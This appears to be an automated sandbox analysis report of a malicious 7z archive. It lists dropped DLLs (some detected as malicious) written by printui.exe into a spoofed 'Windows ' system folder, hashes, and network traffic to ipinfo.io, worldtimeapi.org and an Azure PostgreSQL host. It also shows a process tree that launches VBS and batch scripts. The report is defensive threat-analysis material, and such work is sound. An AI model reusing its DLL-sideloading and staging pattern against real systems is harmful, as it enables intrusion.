          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):13693952
          Entropy (8bit):6.54885571275157
          Encrypted:false
          SSDEEP:393216:9PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRC1qoxlXnwXAaGueVWTXSdEVB3:9ITkUqX
          MD5:6F697D05D9A3A01056706D2220010056
          SHA1:12DCAC1D8DA0EF5637D41B73B7557E57C4323707
          SHA-256:CAAA8F84036A5AFAFF525968364CBFCFB31E5E1EC9A856535BF3A25A279BA027
          SHA-512:7AE5220E85946BC0EDF08DB9E42795B65ADE5AC70C36679C4F7803847591EB819B96A4EB65C001CEDF3B4DBD0C1488D875DD14AE5B4EDE08B7B5218EE06C7476
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 96%
          • Antivirus: Virustotal, Detection: 57%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w.U.w.U.w.U...TJw.U...T.w.U...T.w.U.w.U.w.UA..T.w.UA..T.w.UA..T.w.U...T.w.U.w.UAw.U...T.w.U..XU.w.U...T.w.URich.w.U........................PE..d......f.........." ...$.*..................................................`............`.....................................................<....@...........,...........P.......L..8...........................pK..@............@..H............................text....(.......*.................. ..`.rdata...p...@...r..................@..@.data....-..........................@....pdata...,..........................@..@_RDATA..\.... ......................@..@.fptable.....0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):131920
          Entropy (8bit):6.0574531251583865
          Encrypted:false
          SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
          MD5:F57FB935A9A76E151229F547C2204BBA
          SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
          SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
          SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:data
          Category:dropped
          Size (bytes):432
          Entropy (8bit):7.582504944413675
          Encrypted:false
          SSDEEP:12:KJEuM/0D/giPRiMSWnRRqya0XxJNN/QS2:juF/giPSGRTXXxDeS2
          MD5:3B11E9BFFD60AFB6D4498788EB1D42D1
          SHA1:D096E69CFB6C7397C50F039CB6D106948AFAA076
          SHA-256:B3181E588E17526001C5344F3702B71AB792FE44D0DAD2D6EF6DFECA991A38AD
          SHA-512:7CE0E335E73034C12831D46207FF6BF68CCFE4C58FD188ECE298054EC6F8893A8CB459C29C400E18DE144A78F48BF8E579783A157CBB2CAAA1CA97A70C8F6C41
          Malicious:false
          Preview:g...E.....!P..j..).....4...G...6._"{.2Y".p.........H..O.t...9y^.'F\...G.{|.i..-3.E,..........tE{.r.q......<Uw-.KX0........Q....2CR2.r......C%.<..X.}"r....`1......{z...RMh.!.+.~...?.-g8G...........J.>.....#..Hi.K..b..c*..K.a.@.5..Z.]...*Th..+...'>..Cei.Qo"3w..5..3g..5.R.K....jB.3.l...H..A.~.kA..$........^...Z.`E..L!..8..C5D.]...}..5.-....4.....M........=...kW...R...,..jh.7P.'.. .l....@.A_.D.{e.[...+...?.)K..
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1677824
          Entropy (8bit):6.533586639135605
          Encrypted:false
          SSDEEP:24576:Y0H7N6lppKzx8h0Uy+IGQUhBjL3ukNZylxh0lhSMXlQw0FeaUpqXh0lhSMXl6hhv:Y0H7N8ZhBjL3PJ2FeaV24Qg
          MD5:7A5F4358BE90975402B3F49CD85D8A2E
          SHA1:EE6FDDEDDC8DE2AD63EEBA340A930255A96F0D01
          SHA-256:A6FFC6D42A34A6A9EB26C4BDA36740024004276C2F2FFB46B7DDD4E7F512AE7E
          SHA-512:877835C194224FCE6CBD67444BE557495CBE0BAEF80284B4EA2E84494E754886670B33FFA75F24AD1103CE2D1A1CA13F6E00AD10B2CBC6A663FFA631B22296F5
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 79%
          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........I...'B..'B..'B.."C?.'B..$C..'B?,$C..'B?,#C.'B?,"C..'B.+&C..'B..#C.'B..&C..'B.+"C.'B.+$C..'B..&C.'B..&B.'B.+.C.'B.+'C..'B.+.B..'B.+%C..'BRich..'B........PE..d...N..f.........." ...(.............!....................................................`............................................P...@................@..................X.......8.......................(.......@............................................text...4........................... ..`.rdata.............................@..@.data....}.......J..................@....pdata.......@......................@..@.fptable.............~..............@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):90624
          Entropy (8bit):6.511410074418791
          Encrypted:false
          SSDEEP:1536:EarCl5V5lEwda1RnSbFfbpYwayRyivl9bEKIOcIOZgyZ6rM3SIryPoIKr:EKcV5lEwUbShbpbaCpvsYSZgU6A3SIrf
          MD5:BB78414FB31B53EF8FAD8AFBEDBB834C
          SHA1:2CA62ED9A628E17887C0C9E5C07A2CC44B926EF8
          SHA-256:AE8951AD96124A39B63610D7A5A53B446FC7F19151AC1D8E5AC15E8C88227EBF
          SHA-512:9244CDF4EB86AE4071A74D584D170AC3D8F414F13EF3E9E8988C49B3488DC6FA1BB4DBB771635F145AE06484421C1101D120F63D34F3C479CD5F1FF9AAA646AF
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................[...a!....a!5...a!....a!....a!..............&....&....&7..._...&....Rich............................PE..d....,Of.........." ...(..................................................................`..........................................O......`W..........P....p..X...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...m.......n..................@..@.data........`.......L..............@....pdata..X....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          File type:7-zip archive data, version 0.3
          Entropy (8bit):7.9999972889840985
          TrID:
          • 7-Zip compressed archive (6006/1) 100.00%
          File name:F.7z
          File size:77'248'657 bytes
          MD5:5132591a35248a8d71171cb5f4343334
          SHA1:78a0c5b34c107a68cad2d36424a6efbffac11412
          SHA256:ef33c2231c3d46e64e1d070493ef920e34fd4b7aec4145711eeac0cb0ccb6651
          SHA512:57542705c0df8ca4a6c50430789e20a245803163dfd8d2f0d47eca103befea25a723582e8a673392914625ebdccea8fdf1e48c829a86bb994df790535f5de536
          SSDEEP:1572864:tqYfBhXKIZAGdT5m6MX3x+RQtBm3CD59KiKoBV8vCmT2nl:tqA36xGSR+RyKpzvCmT0
          TLSH:DA0833EB619E7F22CCA64B3143AD1B66CF4B48AEE131CD105B657AD4410978EB30F879
          File Content Preview:7z..'...1..HL.......%.......q.8...4..]. .Hf..t....q..[.^...f...........VR...kRMVG.:....15.)].. .De./.P.....:...w[y.4..E..{....)..5n*h..."..m<.:|B....&s.Si...n...,.+.!......=~..5...N;L.:.W@0l.f...J...R.#.q....:."g3.iZ..o.....'...B. ...|.._....%.......w....
          Icon Hash:74f0e4e4e4e4e0e4
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 30, 2024 07:40:45.852703094 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:45.852745056 CEST | 443 | 49726 | 34.117.59.81 | 192.168.2.17
          Aug 30, 2024 07:40:45.852821112 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:45.856827974 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:45.856837988 CEST | 443 | 49726 | 34.117.59.81 | 192.168.2.17
          Aug 30, 2024 07:40:46.322098017 CEST | 443 | 49726 | 34.117.59.81 | 192.168.2.17
          Aug 30, 2024 07:40:46.322226048 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:46.329931021 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:46.329951048 CEST | 443 | 49726 | 34.117.59.81 | 192.168.2.17
          Aug 30, 2024 07:40:46.330044031 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:46.330070019 CEST | 443 | 49726 | 34.117.59.81 | 192.168.2.17
          Aug 30, 2024 07:40:46.330168009 CEST | 49726 | 443 | 192.168.2.17 | 34.117.59.81
          Aug 30, 2024 07:40:55.156728983 CEST | 49729 | 80 | 192.168.2.17 | 213.188.196.246
          Aug 30, 2024 07:40:55.161508083 CEST | 80 | 49729 | 213.188.196.246 | 192.168.2.17
          Aug 30, 2024 07:40:55.161572933 CEST | 49729 | 80 | 192.168.2.17 | 213.188.196.246
          Aug 30, 2024 07:40:55.163104057 CEST | 49729 | 80 | 192.168.2.17 | 213.188.196.246
          Aug 30, 2024 07:40:55.167927027 CEST | 80 | 49729 | 213.188.196.246 | 192.168.2.17
          Aug 30, 2024 07:40:56.305547953 CEST | 80 | 49729 | 213.188.196.246 | 192.168.2.17
          Aug 30, 2024 07:40:56.305814981 CEST | 49729 | 80 | 192.168.2.17 | 213.188.196.246
          Aug 30, 2024 07:40:56.311134100 CEST | 80 | 49729 | 213.188.196.246 | 192.168.2.17
          Aug 30, 2024 07:40:56.311192036 CEST | 49729 | 80 | 192.168.2.17 | 213.188.196.246
          Aug 30, 2024 07:40:56.332575083 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:40:56.337454081 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:40:56.337541103 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:40:56.337627888 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:40:56.342372894 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:40:56.960865974 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:40:57.011164904 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.288220882 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.293304920 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.463500023 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.463866949 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.468653917 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640347958 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640600920 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640610933 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640620947 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640629053 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640639067 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640650034 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640660048 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.640774012 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.640774012 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.640774012 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.732755899 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.733870029 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.733870029 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:06.738732100 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.738743067 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.909324884 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:06.959216118 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:07.044811010 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:07.045008898 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Aug 30, 2024 07:41:07.049825907 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:07.224741936 CEST | 5432 | 49730 | 20.71.50.126 | 192.168.2.17
          Aug 30, 2024 07:41:07.278189898 CEST | 49730 | 5432 | 192.168.2.17 | 20.71.50.126
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 30, 2024 07:40:45.843632936 CEST | 54869 | 53 | 192.168.2.17 | 1.1.1.1
          Aug 30, 2024 07:40:45.850521088 CEST | 53 | 54869 | 1.1.1.1 | 192.168.2.17
          Aug 30, 2024 07:40:55.149133921 CEST | 58269 | 53 | 192.168.2.17 | 1.1.1.1
          Aug 30, 2024 07:40:55.155946970 CEST | 53 | 58269 | 1.1.1.1 | 192.168.2.17
          Aug 30, 2024 07:40:56.309422016 CEST | 58404 | 53 | 192.168.2.17 | 1.1.1.1
          Aug 30, 2024 07:40:56.331722975 CEST | 53 | 58404 | 1.1.1.1 | 192.168.2.17
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Aug 30, 2024 07:40:45.843632936 CEST | 192.168.2.17 | 1.1.1.1 | 0x7887 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
          Aug 30, 2024 07:40:55.149133921 CEST | 192.168.2.17 | 1.1.1.1 | 0x4d22 | Standard query (0) | worldtimeapi.org | A (IP address) | IN (0x0001) | false
          Aug 30, 2024 07:40:56.309422016 CEST | 192.168.2.17 | 1.1.1.1 | 0xfe6f | Standard query (0) | universalsqlserver.postgres.database.azure.com | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Aug 30, 2024 07:40:45.850521088 CEST | 1.1.1.1 | 192.168.2.17 | 0x7887 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
          Aug 30, 2024 07:40:55.155946970 CEST | 1.1.1.1 | 192.168.2.17 | 0x4d22 | No error (0) | worldtimeapi.org | | 213.188.196.246 | A (IP address) | IN (0x0001) | false
          Aug 30, 2024 07:40:56.331722975 CEST | 1.1.1.1 | 192.168.2.17 | 0xfe6f | No error (0) | universalsqlserver.postgres.database.azure.com | universalsqlserver.privatelink.postgres.database.azure.com | | CNAME (Canonical name) | IN (0x0001) | false
          Aug 30, 2024 07:40:56.331722975 CEST | 1.1.1.1 | 192.168.2.17 | 0xfe6f | No error (0) | universalsqlserver.privatelink.postgres.database.azure.com | | 20.71.50.126 | A (IP address) | IN (0x0001) | false
          • worldtimeapi.org
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.17 | 49729 | 213.188.196.246 | 80 | 6412 | C:\Windows\System32\svchost.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 30, 2024 07:40:55.163104057 CEST | 75 | OUT | GET /api/timezone/Etc/UTC HTTP/1.1
          Host: worldtimeapi.org
          Accept: */*
          Aug 30, 2024 07:40:56.305547953 CEST | 1167 | IN | HTTP/1.1 200 OK
          access-control-allow-credentials: true
          access-control-allow-origin: *
          access-control-expose-headers:
          cache-control: max-age=0, private, must-revalidate
          content-length: 335
          content-type: application/json; charset=utf-8
          cross-origin-window-policy: deny
          date: Fri, 30 Aug 2024 05:40:55 GMT
          server: Fly/e42c399f (2024-08-28)
          vary: accept-encoding
          x-content-type-options: nosniff
          x-download-options: noopen
          x-frame-options: SAMEORIGIN
          x-permitted-cross-domain-policies: none
          x-ratelimit-limit: 60
          x-ratelimit-remaining: 59
          x-ratelimit-reset: 1724997600
          x-request-from: 8.46.123.33
          x-request-id: F_BrIxoNo4gV0tqDYLeB
          x-request-regions: a/iad;s/yyz
          x-response-origin: e2865522b1d968
          x-runtime: 51ms
          x-xss-protection: 1; mode=block
          via: 1.1 fly.io
          fly-request-id: 01J6GWT35CYJ3P0SD4C9FNR3CW-iad
          Data Raw: 7b 22 75 74 63 5f 6f 66 66 73 65 74 22 3a 22 2b 30 30 3a 30 30 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 74 63 2f 55 54 43 22 2c 22 64 61 79 5f 6f 66 5f 77 65 65 6b 22 3a 35 2c 22 64 61 79 5f 6f 66 5f 79 65 61 72 22 3a 32 34 33 2c 22 64 61 74 65 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 35 3a 34 30 3a 35 35 2e 38 32 36 33 36 31 2b 30 30 3a 30 30 22 2c 22 75 74 63 5f 64 61 74 65 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 35 3a 34 30 3a 35 35 2e 38 32 36 33 36 31 2b 30 30 3a 30 30 22 2c 22 75 6e 69 78 74 69 6d 65 22 3a 31 37 32 34 39 39 36 34 35 35 2c 22 72 61 77 5f 6f 66 66 73 65 74 22 3a 30 2c 22 77 65 65 6b 5f 6e 75 6d 62 65 72 22 3a 33 35 2c 22 64 73 74 22 3a 66 61 6c 73 65 2c 22 61 62 62 72 65 76 69 61 74 69 6f 6e 22 3a 22 55 54 43 22 2c 22 64 73 74 5f 6f 66 66 73 65 74 22 3a 30 2c 22 64 73 74 5f 66 72 6f 6d 22 3a 6e 75 6c 6c 2c 22 64 73 74 5f 75 6e 74 69 6c 22 3a 6e 75 6c 6c 2c 22 63 6c 69 65 6e 74 5f 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
          Data Ascii: {"utc_offset":"+00:00","timezone":"Etc/UTC","day_of_week":5,"day_of_year":243,"datetime":"2024-08-30T05:40:55.826361+00:00","utc_datetime":"2024-08-30T05:40:55.826361+00:00","unixtime":1724996455,"raw_offset":0,"week_number":35,"dst":false,"abbreviation":"UTC","dst_offset":0,"dst_from":null,"dst_until":null,"client_ip":"8.46.123.33"}

          Target ID:0
          Start time:01:38:49
          Start date:30/08/2024
          Path:C:\Windows\System32\OpenWith.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
          Imagebase:0x7ff67cd60000
          File size:123'984 bytes
          MD5 hash:E4A834784FA08C17D47A1E72429C5109
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:01:39:05
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:9
          Start time:01:39:11
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:10
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\SgrmBroker.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\SgrmBroker.exe
          Imagebase:0x7ff782530000
          File size:329'504 bytes
          MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:11
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:12
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:14
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:15
          Start time:01:39:13
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:16
          Start time:01:39:26
          Start date:30/08/2024
          Path:C:\Program Files\7-Zip\7zFM.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
          Imagebase:0x640000
          File size:952'832 bytes
          MD5 hash:30AC0B832D75598FB3EC37B6F2A8C86A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Target ID:18
          Start time:01:40:03
          Start date:30/08/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
          Imagebase:0x7ff6ed8b0000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:19
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:20
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:21
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\chcp.com
          Wow64 process (32bit):false
          Commandline:chcp 65001
          Imagebase:0x7ff69afc0000
          File size:14'848 bytes
          MD5 hash:33395C4732A49065EA72590B14B64F32
